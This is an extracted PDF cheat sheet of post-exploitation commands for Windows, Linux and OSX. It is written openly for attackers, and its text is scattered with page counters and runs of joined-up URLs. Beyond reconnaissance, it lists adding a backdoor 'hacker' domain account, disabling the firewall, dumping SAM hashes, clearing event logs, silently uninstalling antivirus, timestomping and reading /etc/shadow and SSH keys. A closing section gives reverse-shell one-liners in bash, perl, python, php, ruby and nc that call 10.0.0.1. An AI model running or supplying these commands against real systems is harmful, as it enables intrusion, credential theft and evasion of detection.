post exploit

8/3/2019 Post Exploit

1/22

Windows Post Exploitation Command List

# Blind files (things to pull when all you can do is blindly read) LFI/dir

traversal

%SYSTEMDRIVE%\boot.ini

# System

##example: COMMAND [syntax1] | [syntax2] (explanation1; explanation2)

whoami

whoami /all

set

qwinsta

qprocess *

at

schtasks [/query /fo csv /v]

net start

sc getkeyname Shell Hardware Detection (use name from net start)

sc qc ShellHWDetection (use keyname from getkeyname)

net config workstation

net time

net file

net session

net use

tasklist [/m] | [/svc] | [/m {dll}]

fsutil fsinfo drives


2/22

# Networking

ipconfig /all

ipconfig /displaydns

netstat -bano

netstat -s -p [tcp|udp|icpm|ip]

netstat -r

netstat -na | findstr :445

netstat -nao | findstr LISTENING //comment: (XP and up for -o flag to get PID,

zuk)

netstat -na | findstr LISTENING (Any windows, generic)

netsh diag show all

net view

net view /domain

net view /domain:otherdomain

net user hacker hacker /add /domain (adds a user to the curredomain

-invasive-)

net user %USERNAME% /domain

net user /domain

net accounts

net accounts /domain

net localgroup administrators

net localgroup administrators /domain (as this was supposed to use

localgroup&domain, this actually another way of getting *current* domain

admins. Zuk)

net group domain admins /domain

net group enterprise admins /domain

net group domain controllers /domain


3/22

nbtstat -a [ip_here]

net share

net session | find /c \\

arp -a

route print

netsh firewall set opmode disable (turns off firewall -invasive-)

netsh firewall set opmode enable (enables firewall -might cause loss of

connection-)

# Configs

gpresult /z

sc qc [ Service name ]

sc query

sc queryex

type %WINDIR%\System32\drivers\etc\hosts

dir %PROGRAMFILES%

echo %COMSPEC%

# Finding important files

tree C:\ /f

dir /a

dir /b /s [Directory -- filename]

Command |find /c /v


4/22

# Files to pull if possible

%WINDIR%\repair\sam

%WINDIR%\System32\drivers\etc\hosts

# Remote System Access

net share \\computername

tasklist /V /S computername

net share nothing$=C:\ /grant:hacker,FULL /unlimited -invasive-

#net user hacker hacker /add

#net localgroup administrators /add hacker

#net use X: \\target\nothing$ hacker /USER:hacker

qwinsta /SERVER:computername

qprocess /SERVER:computername *

net use \\computername (maps IPC$ which does not show up as a drive)

net use \\computername /user:DOMAINNAME\username password

(maps IPC$ under another username)

net time \\computername (Shows the time of target computer)

dir \\computername\share_or_admin_share\ (dir list a remote directory)

tasklist /V /S computername

Lists tasks w/users running those tasks on a remote system. This will remove

any IPC$ connection after it is done so if you are using another user, you

need to reinitiate the IPC$ mount
http://computername/http://target//nothing$http://computername/http://computername/http://computername/http://computername//share_or_admin_share//http://target//nothing$http://computername/http://computername/http://computername/http://computername//share_or_admin_share//http://computername/


5/22

# WMI

wmic bios

wmic qfe

wmic qfe get hotfixid (This gets patches IDs)

wmic startup

wmic service

wmic os

wmic process get caption,executablepath,commandline

wmic process call create process_name (executes a program)

wmic process where name=process_name call terminate (terminatesprogram)

wmic logicaldisk where drivetype=3 get name, freespace, systemname,

filesystem, size, volumeserialnumber (hard drive information)

wmic useraccount (usernames, sid, and various security related goodies)

wmic useraccount get /ALL

wmic share get /ALL (you can use ? for gets help ! )

wmic startup list full (this can be a huge list!!!)

wmic /node:"hostname" bios get serialnumber (this can be great for finding

warranty info about target)

Reg Command

reg save HKLM\Security security.hive (Save security hive to a file)

reg save HKLM\System system.hive (Save system hive to a file)

reg save HKLM\SAM sam.hive (Save sam to a file)=

reg add [\\TargetIPaddr\] [RegDomain][ \Key ]

reg export [RegDomain]\[Key] [FileName]
http://targetipaddr//http://targetipaddr//


6/22

reg import [FileName ]

reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] (you can to

add /s for recurse all values )

Deleting Logs

wevtutil el (list logs)

wevtutil cl (Clear specific log)

del %WINDIR%\*.log /a /s /q /f

Uninstalling Software AntiVirus (Non interactive)

wmic product get name /value (this gets software names)

wmic product where name="XXX" call uninstall /Interactive:Off (this

uninstalls software)

# Other

pkgmgr usefull /iu :Package

pkgmgr usefull /iu :TelnetServer (Install Telnet Service ...)

pkgmgr /iu:TelnetClient (Client )

rundll32.exe user32.dll, LockWorkStation (locks the screen -invasive-)

wscript.exe

cscript.exe
http://targetipaddr//http://targetipaddr//


7/22

## OS SPECIFIC

# Win2k3

winpop stat domainname

# Vista/7

winstat features

wbadmin get status

wbadmin get items

gpresult /H gpols.htm

(Page break just so we can have the straight up cmds on their own)

## Meterpreter Commands

ps (show running processes and their associated users/id numbers)

getuid

getpid

getprivs (shows current privileges)

getsystem (attempts to get SYSTEM, be warned, attempts Kitrap0d local

exploit as well)

sysinfo


8/22

timestomp (Remove/screw up timestamps if you are good enough this

messes up audit tools)

clearev

hashdump (dump SAM file hashes for pass the hash or cracking) or run

hashdump

migrate [pid number] (Move from exploited process into another process)

## Useful Meterpreter Scripts

## Useful Meterpreter Post Modules

vsploit

post/windows/gather/smart_hashdump

post/windows/gather/credentials/vnc

post/windows/escalate/bypassuac (mixed results)

## Useful Techniques

Pass The Hash attack (Gain access to other computers with stolen hashes,

no cracking involved)

Change Wallpaper

Ex: You have to upload a file called wallpaper.bmp to C: drive


9/22

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_MULTI_SZ /d

"C:\wallpaper.bmp"

rundll32.exe user32.dll,UpdatePerUserSystemParameters

## GOING TO MOVE EVERYTHING HERE FOR LEGIBILITY ONCE EDITING DIES

DOWN

-=SYSTEM=-

Command Expected and / or Sample Output

whoami Returns the username youre logged in as.

systemconfig

.

Linux/Unix/BSD Post Exploitation Command List


traversal

/etc/resolv.conf (everyone always has read on this and it wont trigger an IDS)

/etc/motd, /etc/issue

# System


10/22

uname -a

ps aux

ps -aef

id

arch

w

who -a

gcc -v

mysql --version

perl -v

ruby -v

python --version

df -k

mount

last -a

lastlog

lastlogin (*bsd)

getenforce

dmesg

lspci

lsusb

lshw

free -m

cat /proc/cpuinfo

cat /proc/meminfo

du -h --max-depth=1 /


11/22

which nmap (see if its already installed)

locate bin/nmap

which nc (see if its already installed)

locate bin/

whoami

jps -l

# Networking

hostname -f

ip addr show

ifconfig -a

route -n

cat /etc/network/interfaces

iptables -L -n

netstat -anop

netstat -r

netstat -nltupw (root with raw sockets)

arp -a

lsof -nPi

# Configs

cat /etc/issue{,.net}

cat /etc/passwd


12/22

cat /etc/shadow (gotta try..)

cat /etc/shadow~ # (sometimes there when edited with gedit)

cat /etc/master.passwd

cat /etc/group

cat /etc/hosts

cat /etc/crontab

cat /etc/sysctl.conf

for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done

# (Lists all crons)

cat /etc/resolv.conf

cat /etc/lsb-release

cat /etc/redhat-release

cat /etc/samba/smb.conf

pdbedit -L -w

pdbedit -L -v

cat /etc/exports

cat /etc/auto.master

cat /etc/auto_master

cat /etc/fstab

cat /etc/exports

find /etc/sysconfig/ -type f -exec cat {} \;

cat /etc/sudoers

# Determine Distro:

/etc/SUSE-release # Novell SUSE

/etc/redhat-release, /etc/redhat_version # Red Hat


13/22

/etc/fedora-release # Fedora

/etc/slackware-release, /etc/slackware-version # Slackware

/etc/debian_release, /etc/debian_version, # Debian

/etc/mandrake-release # Mandrake

/etc/sun-release # Sun JDS

/etc/release # Solaris/Sparc

/etc/gentoo-release # Gentoo

/etc/lsb-release # ubuntu

?? # arch linux

arch # on OpenBSD sample: OpenBSD.amd64

uname -a (often hints at it pretty well)

# Installed Packages

rpm -qa --last | head

yum list | grep installed

dpkg -l

dpkg -l |grep -i linux-image

pkg_info # FreeBSD

#Package Sources

cat /etc/apt/sources.list

ls -l /etc/yum.repos.d/


14/22

cat /etc/yum.conf

# Finding Important Files

find /var/log -type f -exec ls -la {} \;

ls -alhtr /mnt

ls -alhtr /media

ls -alhtr /tmp

ls -alhtr /home

ls /home/*/.ssh/*

find /home -type f -iname '.*history'

ls -lart /etc/rc.d/

locate tar | grep [.]tar$

locate tgz | grep [.]tgz$

locate sql l grep [.]sql$

locate settings | grep [.]php$

locate config.inc | grep [.]php$

ls /home/*/id*

locate .properties | grep [.]properties # java config files

locate .xml | grep [.]xml # java/.net config files

find /sbin /usr/sbin /opt /lib `echo $PATH | sed s/:/ /g` -perm -4000 # find

suids

## Per User

ls -alh /home/*/

ls -alh /home/*/.ssh/


15/22

cat /home/*/.ssh/authorized_keys

cat /home/*/.ssh/known_hosts

cat /home/*/.*hist*

find -type f /home/*/.vnc /home/*/.subversion

grep ^ssh /home/*/.*hist*

grep ^telnet `/home/*/.*hist*

grep ^mysql /home/*/.*hist*

cat /home/*/.viminfo

sudo -l # if sudoers is not readable, this sometimes works per user

crontab -l

## Priv (sudod or as root)

ls -alh /root/

cat /etc/sudoers

cat /etc/shadow

cat /etc/master.passwd # OpenBSD

cat /var/spool/cron/crontabs/*

lsof -nPi

ls /home/*/.ssh/*

## Reverse Shell

starting list sourced from: http://pentestmonkey.net/cheat-

sheet/shells/reverse-shell-cheat-sheet

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheethttp://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheethttp://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheethttp://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet


16/22

perl -e 'use Socket;$i="10.0.0.1";

$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect

(S,sockaddr_in($p,inet_aton($i))))

{open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/s

h -i");};'

python -c 'import

socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

;s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);

os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i &3 2>&3");'

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh

-i &%d 2>&%d",f,f,f)'

nc -e /bin/sh 10.0.0.1 1234 # note need -l on some versions, and many does

NOT support -e anymore

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

xterm -display 10.0.0.1:1

Listener- Xnest :1

Add permission to connect- xhost +victimIP

## GOING TO MOVE EVERYTHING HERE FOR LEDGIBILITY ONCE EDITING DIES

DOWN

-=SYSTEM=-

Command Expected and / or Sample Output

uname -a Linux kernel version, distribution

ps aux List of running processes

id List current user and group along with user/group id

w Show about who is logged,they are doing


17/22

who -a Print information about about users

OSX Post Exploitation Command List


traversal

/etc/resolv.conf (everyone always has read on this and it wont trigger an IDS)

#SYSTEM

uname -a

sw_vers -productName

sw_vers -productVersion

system_profiler

id

printenv

who

ps aux

ps ea

ls -alh /Applications/

/Library/Application Support/VMware Fusion/vmrun list

/Library/Application Support/VMware Fusion/vmrun CopyFileFromHostToGuest

windowsmalicious.exe WindowsVM

/Library/Application Support/VMware Fusion/vmrun captureScreen


18/22

WindowsVM

Snow Leopard and Lion

dscacheutil -q user

dscacheutil -q group

Tiger

lookupd -q user

lookupd -q group

#Networking

ifconfig

netstat -np tcp

netstat -np udp

#Configs

ls -alh /private/etc/

#Finding Important Files

ls -ma ~/

ls -alh /Users/

ls -alh /Users/*/.ssh/

ls -alh /Users/*/.gnupg/


19/22

#Files to pull

#Remote System Access

#Priv

cat /Library/Application Support/Objective Development/Little Snitch/rules.xpl

ls /Library/Application Support/VMware Fusion/licenses/site/


20/22


21/22


22/22

post exploit

Documents